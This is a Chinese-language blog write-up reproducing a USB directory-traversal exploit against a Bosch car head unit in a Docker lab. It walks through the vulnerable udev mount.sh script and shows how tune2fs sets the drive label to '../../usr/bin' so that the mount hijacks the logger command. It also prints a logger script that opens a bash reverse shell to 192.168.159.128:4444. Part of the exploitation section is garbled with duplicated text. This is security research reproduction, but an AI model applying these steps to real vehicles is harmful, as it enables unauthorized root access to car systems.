github上破解日系車機(jī)的文章 - https://github.com/ea/bosch_headunit_root

其中有利用 U 盤獲取車機(jī) shell 的操作

主要根據(jù)下面這篇文章進(jìn)行環(huán)境搭建和復(fù)現(xiàn)

U盤目錄穿越獲取車機(jī) SHELL（含模擬環(huán)境） - ?https://delikely.github.io/2021/06/04/U%E7%9B%98%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A%E8%8E%B7%E5%8F%96%E8%BD%A6%E6%9C%BASHELL/

環(huán)境準(zhǔn)備

掏出我的U盤，不過好像ubuntu不支持

第一個(gè)是插入U(xiǎn)盤前 第二個(gè)是插入U(xiǎn)盤后

一般來說 /dev/sda 是指第一個(gè)磁盤設(shè)備，/dev/sdb 是指第二個(gè)磁盤設(shè)備，U盤插進(jìn)去一般就是sdb了，因?yàn)樘摂M機(jī)本身還有一個(gè)磁盤

我用blkid命令都不顯示 額….

懷疑是不是因?yàn)閁盤不是ETX4結(jié)構(gòu)的

掏出我的傲梅分區(qū)助手，格式化分區(qū)

選擇EXT4

等待執(zhí)行完成即可

插入ubuntu虛擬機(jī) 可以看到這里已經(jīng)是ext4類型了

接下來是固件環(huán)境的搭建，這里直接使用原博主已經(jīng)弄好的Dockerfile，在虛擬機(jī)里面搭建一個(gè)模擬環(huán)境（可能這個(gè)時(shí)候你想說，那我們U盤插進(jìn)去的時(shí)候，是插的虛擬機(jī)還是docker容器，答案是使用 --privileged 參數(shù)，以特權(quán)模式運(yùn)行容器，即容器內(nèi)的進(jìn)程將具有與主機(jī)相同的權(quán)限。這可以讓容器內(nèi)的進(jìn)程執(zhí)行敏感操作，如掛載文件系統(tǒng)等）

我這里沒有直接用wget，下載了對(duì)應(yīng)文件傳到虛擬機(jī)上

接著創(chuàng)建鏡像

~/bosch?headunit?root$?sudo?docker?build?-t?delikely/bosch_headunit_root:automount?.
[+]?Building?29.8s?(9/9)?FINISHED
?=>?[internal]?load?build?definition?from?Dockerfile??????????????????????????????????????????????????????????????????????????0.0s
?=>?=>?transferring?dockerfile:?320B??????????????????????????????????????????????????????????????????????????????????????????0.0s
?=>?[internal]?load?.dockerignore?????????????????????????????????????????????????????????????????????????????????????????????0.0s
?=>?=>?transferring?context:?2B???????????????????????????????????????????????????????????????????????????????????????????????0.0s
?=>?[internal]?load?metadata?for?docker.io/library/ubuntu:12.04??????????????????????????????????????????????????????????????18.0s
?=>?[1/4]?FROM?docker.io/library/ubuntu:12.04@sha256:18305429afa14ea462f810146ba44d4363ae76e4c8dfc38288cf73aa07485005????????10.5s
?=>?=>?resolve?docker.io/library/ubuntu:12.04@sha256:18305429afa14ea462f810146ba44d4363ae76e4c8dfc38288cf73aa07485005?????????0.0s
?=>?=>?sha256:18305429afa14ea462f810146ba44d4363ae76e4c8dfc38288cf73aa07485005?1.36kB?/?1.36kB????????????????????????????????0.0s
?=>?=>?sha256:5b117edd0b767986092e9f721ba2364951b0a271f53f1f41aff9dd1861c2d4fe?3.62kB?/?3.62kB????????????????????????????????0.0s
?=>?=>?sha256:d8868e50ac4c7104d2200d42f432b661b2da8c1e417ccfae217e6a1e04bb9295?39.10MB?/?39.10MB??????????????????????????????6.5s
?=>?=>?sha256:83251ac64627fc331584f6c498b3aba5badc01574e2c70b2499af3af16630eed?57.94kB?/?57.94kB??????????????????????????????0.9s
?=>?=>?sha256:589bba2f1b36ae56f0152c246e2541c5aa604b058febfcf2be32e9a304fec610?423B?/?423B????????????????????????????????????0.8s
?=>?=>?sha256:d62ecaceda3964b735cdd2af613d6bb136a52c1da0838b2ff4b4dab4212bcb1c?680B?/?680B????????????????????????????????????1.3s
?=>?=>?sha256:6d93b41cfc6bf0d2522b7cf61588de4cd045065b36c52bd3aec2ba0622b2b22b?162B?/?162B????????????????????????????????????1.4s
?=>?=>?extracting?sha256:d8868e50ac4c7104d2200d42f432b661b2da8c1e417ccfae217e6a1e04bb9295?????????????????????????????????????3.9s
?=>?=>?extracting?sha256:83251ac64627fc331584f6c498b3aba5badc01574e2c70b2499af3af16630eed?????????????????????????????????????0.0s
?=>?=>?extracting?sha256:589bba2f1b36ae56f0152c246e2541c5aa604b058febfcf2be32e9a304fec610?????????????????????????????????????0.0s
?=>?=>?extracting?sha256:d62ecaceda3964b735cdd2af613d6bb136a52c1da0838b2ff4b4dab4212bcb1c?????????????????????????????????????0.0s
?=>?=>?extracting?sha256:6d93b41cfc6bf0d2522b7cf61588de4cd045065b36c52bd3aec2ba0622b2b22b?????????????????????????????????????0.0s
?=>?[internal]?load?build?context?????????????????????????????????????????????????????????????????????????????????????????????0.0s
?=>?=>?transferring?context:?33B??????????????????????????????????????????????????????????????????????????????????????????????0.0s
?=>?[2/4]?WORKDIR?/etc/???????????????????????????????????????????????????????????????????????????????????????????????????????0.6s
?=>?[3/4]?COPY?./udev.tar.gz?/etc/????????????????????????????????????????????????????????????????????????????????????????????0.0s
?=>?[4/4]?RUN?tar?xzvf?udev.tar.gz?-C?./udev/?????????????????????????????????????????????????????????????????????????????????0.5s
?=>?exporting?to?image????????????????????????????????????????????????????????????????????????????????????????????????????????0.1s
?=>?=>?exporting?layers???????????????????????????????????????????????????????????????????????????????????????????????????????0.1s
?=>?=>?writing?image?sha256:b7f09bab4df68c56fbfcb47df03b921998fe677b5b1158b01d5d29a8625c962f??????????????????????????????????0.0s
?=>?=>?naming?to?docker.io/delikely/bosch_headunit_root:automount?????????????????????????????????????????????????????????????0.0s


額這么慢？

不好意思打開方式錯(cuò)了，先改docker鏡像源

sudo vi /etc/docker/daemon.json

添加

{
??"registry-mirrors":?["https://y0qd3iq.mirror.aliyuncs.com"]
}


重啟docker

service?docker?restart


可以看一下更新成功沒有

sudo?docker?info|grep?Mirrors?-A?1


現(xiàn)在再搭建docker，世界終于美好了

接下來運(yùn)行這個(gè)鏡像 原文中的命令有點(diǎn)問題 這里使用

~/bosch?headunit?root$?sudo?docker?run?-itd?--privileged=true?delikely/bosch_headunit_root:automount
05993c72efb7425b800924ac22d4d521b4a003261180a35cff301ad6f9b30db7


OK到這里環(huán)境終于OK了

漏洞代碼分析

因?yàn)槲覀兊膁ocker前面啟動(dòng)設(shè)置的原因 所以現(xiàn)在如果插入U(xiǎn)盤 會(huì)直接掛載到docker容器中 如下

可以看到是在容器中

另外車機(jī)的操作系統(tǒng)為 Linux

U 盤等外設(shè)熱插拔由 udev 實(shí)現(xiàn)。udev 是 Linux 系統(tǒng)中的一個(gè)設(shè)備管理守護(hù)進(jìn)程，全稱為 "Userspace Device Manager"（用戶空間設(shè)備管理器）。它負(fù)責(zé)監(jiān)聽和管理計(jì)算機(jī)系統(tǒng)中的硬件設(shè)備

配置文件在 /etc/udev 下 。udev 會(huì)根據(jù)設(shè)備的 UUID 和 LABEL，構(gòu)造掛載點(diǎn)。UUID 是塊設(shè)備的唯一標(biāo)識(shí)符，LAEBL 是塊設(shè)備的一個(gè)標(biāo)簽

車機(jī)中自定義了 U 盤掛載腳本，在 udev 配置文件 /etc/udev/rules.d/local.rules 中 ，指定了由腳本 /etc/udev/scripts/mount.sh 處理

接下來看 mount.sh 的內(nèi)容

#!/bin/bash
#
#?Called?from?udev
#?Attempt?to?mount?any?added?block?devices?by?UUID
#?and?remove?any?removed?devices
#

.?/etc/default/rcS

if?[?-n?"$DEVDEBUG"?]
then
?export?>>?/tmp/env.txt
fi

MOUNT="/bin/mount"
UMOUNT="/bin/umount"
MOUNTPT="/dev/media"
MOUNTDB="/tmp/.automount"

devname=${DEVNAME##*/}

check_mount()?{
????dev=$1
????not_found=1

????exec?4<?/proc/mounts

????read?-u?4?device?mount_point?skip
????while?[?$??-eq?0?];?do
????????case?${device}?in
????????????$dev)
???????????????not_found=0
???????????????echo?${mount_point}
???????????????;;
????????????*)
???????????????;;
?????????esac
?????????read?-u?4?device?mount_point?skip
????done

????exec?4<&-

????return?${not_found}
}

automount()?{
????if?[?-z?"${ID_FS_TYPE}"?];?then
????????logger?-p?user.err?"mount.sh/automount"?"$DEVNAME?has?no?filesystem,?not?mounting"
????????return
????fi

????#?Determine?the?name?for?the?mount?point.??First?check?for?the
????#?uuid,?then?for?the?label?and?then?for?a?unique?name.
????if?[?-n?"${ID_FS_UUID}"?];?then
????????mountdir=${ID_FS_UUID}
????elif?[?-n?"${ID_FS_LABEL}"?];?then
????????mountdir=${ID_FS_LABEL}
????else
????????mountdir="disk"
????????while?[?-d?$MOUNTPT/$mountdir?];?do
????????????mountdir="${mountdir}_"
????????done
????fi

????#?Create?the?mount?point.
????!?test?-d?"$MOUNTPT/$mountdir"?&&?mkdir?-p?"$MOUNTPT/$mountdir"

????#?And?mount?the?disk?or?partition.
????if?[?-n?${ID_FS_TYPE}?]
????then
??????if?[?"vfat"?=?${ID_FS_TYPE}?]
??????then
????????IOCHARSET=",utf8=1"
??????elif?[?"ntfs"?=?${ID_FS_TYPE}?]
??????then
????????IOCHARSET=",nls=utf8"
??????fi
????fi

????result=$($MOUNT?-t?${ID_FS_TYPE}?-o?sync,ro$IOCHARSET?$DEVNAME?"$MOUNTPT/$mountdir"?2>&1)
????status=$?
????if?[?${status}?-ne?0?];?then
????????logger?-p?user.err?"mount.sh/automount"?"$MOUNT?-t?${ID_FS_TYPE}?-o?sync,ro?$DEVNAME?\"$MOUNTPT/$mountdir\"?failed:?${result}"
????????rm_dir?"$MOUNTPT/$mountdir"
????else
????????logger?"mount.sh/automount"?"mount?[$MOUNTPT/$mountdir]?with?type?${ID_FS_TYPE}?successful"
????????mkdir?-p?${MOUNTDB}
????????echo?-n?"$MOUNTPT/$mountdir"?>?"${MOUNTDB}/$devname"
????fi
}

rm_dir()?{
????#?We?do?not?want?to?rm?-r?populated?directories
????if?test?"`find?"$1"?|?wc?-l?|?tr?-d?"?"`"?-lt?2?-a?-d?"$1"
????then
????????!?test?-z?"$1"?&&?rm?-r?"$1"
????else
????????logger?-p?user.err?"mount.sh/automount"?"not?removing?non-empty?directory?[$1]"
????fi
}

if?[?"$ACTION"?=?"add"?]?&&?[?-n?"$DEVNAME"?];?then
????check_mount?"$DEVNAME"?||?automount
fi

if?[?"$ACTION"?=?"change"?]?&&?[?-n?"$DEVNAME"?];?then
????#?Check?if?the?disk?can?be?opened.
????if?[?exec?<$DEVNAME?];?then
????????#?The?disk?can?be?opened,?so?check?for?a?file?system?and?mount
????????#?it.?Otherwise?wait?for?the?add?events?for?the?partitions.
????????if?[?-n?"${ID_FS_TYPE}"?];?then
????????????#?There?is?a?file?system,?so?try?to?mount?it.
????????????check_mount?"$DEVNAME"?||?automount
????????fi
????else
????????#?The?disk?cannot?be?opened.?Unmount?all?mount?points
????????#?referring?to?this?disk?including?partitions.
????????for?file?in?$(ls?${MOUNTDB}/$devname*?2>&-)
????????do
????????????read?mountdir?<?${file}
????????????devname=${file#${MOUNTDB}/}

????????????logger?"mount.sh/automount"?"unmounting?[${mountdir}]"
????????????$UMOUNT?-l?$mountdir

????????????#?Remove?empty?directories?from?auto-mounter
????????????rm_dir?"${mountdir}"
????????????rm?"${MOUNTDB}/$devname"
????????done
????fi
fi

if?[?"$ACTION"?=?"remove"?]?&&?[?-x?"$UMOUNT"?]?&&?[?-n?"$DEVNAME"?];?then

????for?mnt?in?$(check_mount?"$DEVNAME")
????do
????????logger?"mount.sh/automount"?"unmounting?[$mnt]"
????????$UMOUNT?-l?$mnt

????????#?Remove?empty?directories?from?auto-mounter
????????if?[?-e?"${MOUNTDB}/$devname"?];?then
????????????read?mountdir?<?${MOUNTDB}/$devname
????????????rm_dir?"$mountdir"
????????????rm?"${MOUNTDB}/$devname"
????????????rm?"${INFODB}/$devname"
????????fi
????done
fi


查看主動(dòng)掛載函數(shù)

automount()?{
????if?[?-z?"${ID_FS_TYPE}"?];?then
????????logger?-p?user.err?"mount.sh/automount"?"$DEVNAME?has?no?filesystem,?not?mounting"
????????return
????fi

????#?Determine?the?name?for?the?mount?point.??First?check?for?the
????#?uuid,?then?for?the?label?and?then?for?a?unique?name.
????if?[?-n?"${ID_FS_UUID}"?];?then
????????mountdir=${ID_FS_UUID}
????elif?[?-n?"${ID_FS_LABEL}"?];?then
????????mountdir=${ID_FS_LABEL}
????else
????????mountdir="disk"
????????while?[?-d?$MOUNTPT/$mountdir?];?do
????????????mountdir="${mountdir}_"
????????done
????fi

????#?Create?the?mount?point.
????!?test?-d?"$MOUNTPT/$mountdir"?&&?mkdir?-p?"$MOUNTPT/$mountdir"

????#?And?mount?the?disk?or?partition.
????if?[?-n?${ID_FS_TYPE}?]
????then
??????if?[?"vfat"?=?${ID_FS_TYPE}?]
??????then
????????IOCHARSET=",utf8=1"
??????elif?[?"ntfs"?=?${ID_FS_TYPE}?]
??????then
????????IOCHARSET=",nls=utf8"
??????fi
????fi

????result=$($MOUNT?-t?${ID_FS_TYPE}?-o?sync,ro$IOCHARSET?$DEVNAME?"$MOUNTPT/$mountdir"?2>&1)
????status=$?
????if?[?${status}?-ne?0?];?then
????????logger?-p?user.err?"mount.sh/automount"?"$MOUNT?-t?${ID_FS_TYPE}?-o?sync,ro?$DEVNAME?\"$MOUNTPT/$mountdir\"?failed:?${result}"
????????rm_dir?"$MOUNTPT/$mountdir"
????else
????????logger?"mount.sh/automount"?"mount?[$MOUNTPT/$mountdir]?with?type?${ID_FS_TYPE}?successful"
????????mkdir?-p?${MOUNTDB}
????????echo?-n?"$MOUNTPT/$mountdir"?>?"${MOUNTDB}/$devname"
????fi
}


逐行分析

下面的代碼判斷U盤的文件系統(tǒng) ID_FS_TYPE，可識(shí)別就繼續(xù)執(zhí)行，否則就退出

if?[?-z?"${ID_FS_TYPE}"?];?then
????logger?-p?user.err?"mount.sh/automount"?"$DEVNAME?has?no?filesystem,?not?mounting"
????return
fi


然后設(shè)置mountdir，如果 ID_FS_UUID 不為空則 mountdir 為 ID_FS_UUID，如果 ID_FS_LABEL 不為空則 mountdir 為 ID_FS_LABEL，否則mountdir為disk

if?[?-n?"${ID_FS_UUID}"?];?then
????mountdir=${ID_FS_UUID}
elif?[?-n?"${ID_FS_LABEL}"?];?then
????mountdir=${ID_FS_LABEL}
else
????mountdir="disk"
????while?[?-d?$MOUNTPT/$mountdir?];?do
????????mountdir="${mountdir}_"
????done
fi


拼接一下 /dev/media 就是形成了最終的掛載點(diǎn)。最后使用 mount 命令將 U盤掛載到剛才構(gòu)造的這個(gè)路徑上

!?test?-d?"$MOUNTPT/$mountdir"?&&?mkdir?-p?"$MOUNTPT/$mountdir"


下面這部分因?yàn)槲覀兪荅TX4所以可以忽略

#?And?mount?the?disk?or?partition.
if?[?-n?${ID_FS_TYPE}?]
then
??if?[?"vfat"?=?${ID_FS_TYPE}?]
??then
????IOCHARSET=",utf8=1"
??elif?[?"ntfs"?=?${ID_FS_TYPE}?]
??then
????IOCHARSET=",nls=utf8"
??fi
fi


然后是真正的掛載操作

result=$($MOUNT?-t?${ID_FS_TYPE}?-o?sync,ro$IOCHARSET?$DEVNAME?"$MOUNTPT/$mountdir"?2>&1)


咱們接著把掛載腳本看完

status=$?
if?[?${status}?-ne?0?];?then
????logger?-p?user.err?"mount.sh/automount"?"$MOUNT?-t?${ID_FS_TYPE}?-o?sync,ro?$DEVNAME?\"$MOUNTPT/$mountdir\"?failed:?${result}"
????rm_dir?"$MOUNTPT/$mountdir"
else
????logger?"mount.sh/automount"?"mount?[$MOUNTPT/$mountdir]?with?type?${ID_FS_TYPE}?successful"
????mkdir?-p?${MOUNTDB}
????echo?-n?"$MOUNTPT/$mountdir"?>?"${MOUNTDB}/$devname"
fi


我們看掛載成功之后的邏輯 會(huì)調(diào)用logger命令，我們劫持/usr/bin/之后，可以在U盤里面再寫一個(gè)logger腳本，導(dǎo)致掛載的時(shí)候運(yùn)行到這里的時(shí)候，調(diào)用我們的logger腳本，從而實(shí)現(xiàn)反彈shell

漏洞利用

因?yàn)?mountdir這里很關(guān)鍵，剛好是我們能夠控制的而且沒有什么過濾操作，存在目錄穿越漏洞咱們接著把掛載腳本看完¨G12G我們看掛載成功之后的邏輯會(huì)調(diào)用logger命令，我們劫持/usr/bin/之后，可以在U盤里面再寫一個(gè)logger腳本，導(dǎo)致掛載的時(shí)候運(yùn)行到這里的時(shí)候，調(diào)用我們的logger腳本，從而實(shí)現(xiàn)反彈shell¨K21K因為mountdir 沒有被過濾，所以可以控制

前面 mountdir來實(shí)現(xiàn)目錄穿越，從而劫持系統(tǒng)中的程序實(shí)現(xiàn)任意命令執(zhí)行前面mountdir 我們可以通過 ID_FS_UUID 和 ID_FS_LABEL 來控制

blkid 命令是一個(gè)用于顯示塊設(shè)備（如硬盤、分區(qū)等）的文件系統(tǒng)類型和UUID（Universally Unique Identifier）的工具命令。它可以幫助您在 Linux 系統(tǒng)中識(shí)別和管理塊設(shè)備。

/etc#?blkid?/dev/sdb1
/dev/sdb1:?LABEL="EasyU"?UUID="7cc162e8-93d7-1f44-bbd6-0d308f113468"?TYPE="ext4"


可以看到其中

• LABEL 為 EasyU

• UUID 為 7cc162e8-93d7-1f44-bbd6-0d308f113468

我們使用 tune2fs 工具

tune2fs 是一個(gè)用于調(diào)整和修改 ext2、ext3 和 ext4 文件系統(tǒng)參數(shù)的命令行工具。它是 e2fsprogs 軟件包（ext2/ext3/ext4 文件系統(tǒng)工具集）中的一部分，常用于 Linux 系統(tǒng)中

使用tune2fs控制UUID

/etc#?tune2fs?-U?"../../usr/bin"?/dev/sdb1
tune2fs?1.42?(29-Nov-2011)
tune2fs:?Invalid?UUID?format


不規(guī)范的UUID，所以將其置空

/etc#?tune2fs?-U?NULL?/dev/sdb1
tune2fs?1.42?(29-Nov-2011)


控制 LABEL

/etc#?tune2fs?-L?"../../usr/bin"?/dev/sdb1
tune2fs?1.42?(29-Nov-2011)


看一下成果

/etc#?blkid?/dev/sdb1
/dev/sdb1:?LABEL="../../usr/bin"?UUID="7cc162e8-93d7-1f44-bbd6-0d308f113468"?TYPE="ext4"


暫停docker，在U盤目錄下編寫logger腳本來進(jìn)行反彈shell，這里我除了IP，其余直接復(fù)制原博主的了

root@kali:~/automotive#?mount?/dev/sdb1?/media/root/
root@kali:~/automotive#?cd?/media/root
root@kali:/media/root#?cat?logger
#!/bin/bash
/bin/bash?-i?>&?/dev/tcp/192.168.159.128/4444?0>&1
root@kali:/media/root#?chmod?+x?logger
root@kali:/media/root#?cd?-
root@kali:~/automotive#?umount?/dev/sdb1


啟動(dòng)docker環(huán)境~

最后再插入U(xiǎn)盤 ，ubuntu虛擬機(jī)拿到反彈shell~ （大功告成

原來的/usr/bin 目錄下就被劫持了，只剩下了U盤內(nèi)容

可以看到反彈shell中我們用 whoami 就找不到命令了

如果想要使用其他的/usr/bin/目錄下的命令，就需要把原來/usr/bin 目錄的文件（或相同架構(gòu)的可執(zhí)行文件）拷貝到 U 盤根目錄，這樣在劫持了之后才有命令可用